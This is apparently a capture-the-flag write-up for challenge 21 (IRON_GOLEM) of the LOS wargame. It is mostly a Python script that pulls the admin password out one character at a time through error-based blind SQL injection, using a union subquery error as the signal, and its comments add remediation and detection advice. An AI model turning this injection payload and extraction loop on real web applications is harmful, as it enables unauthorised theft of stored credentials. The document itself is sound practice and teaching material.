Wargame/LOS(rubiya)
LOS :: 21번 IRON_GOLEM
G0pher
2018. 8. 23. 10:30
WRITE UP
"""Solver for LOS (rubiya) challenge 21, IRON_GOLEM.

Recovers the admin `pw` value one character at a time, using a database
error as a true/false signal, and then submits the recovered value.

Defender's reading of the requests below (the challenge's server-side code
is not shown on this page, so both points are inferred):
  * the `pw` parameter appears to reach the SQL statement unescaped, so a
    quote inside the value changes the structure of the query;
  * the response appears to carry database error text, so an error that
    fires only when a condition holds leaks one bit per request.
Bound parameters (prepared statements) remove the first condition. Returning
a generic error page and logging the detail server-side removes the second.

Detection: each character costs about 17 requests (binary search over
0..100000) that differ only in two numbers, and the replies alternate
between error and non-error. That repetition shows up in both web access
logs and database error logs.
"""
import requests

url = "http://los.rubiya.kr/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php"
# Placeholder session cookie; the author's real value is not on the page.
session = {'PHPSESSID': 'MY_SESSION'}
data = {}
flag = ""

print("[∞] flag : ", end='')

# Positions 1..17 are hard-coded; presumably the length was found separately.
for position in range(1, 18):
    # Invariant: low <= ord(character at `position`) <= high.
    low, high = 0, 100000
    while low != high:
        # Round the midpoint up so that `low = probe` always makes progress.
        probe = low + (high - low) // 2 + 1
        # When the comparison is true the IF() yields a two-row subquery,
        # which the database rejects; otherwise it yields the constant 1.
        data['pw'] = (
            f"' or id='admin' and if(ord(mid(pw,{position},1))<{probe}"
            ",(select 1 union select 2),1)#"
        )
        response = requests.get(url, params=data, cookies=session)
        if "Subquery" in response.text:
            # Error text present: the character code is below `probe`.
            high = probe - 1
        else:
            # No error: the character code is `probe` or above.
            low = probe
    recovered = chr(low)
    print(recovered, end='')
    flag += recovered

# Submit the recovered value as an ordinary password to confirm it.
data['pw'] = flag
response = requests.get(url, params=data, cookies=session)
if "Clear!" in response.text:
    print("\n[♪] IRON_GOLEM Clear!")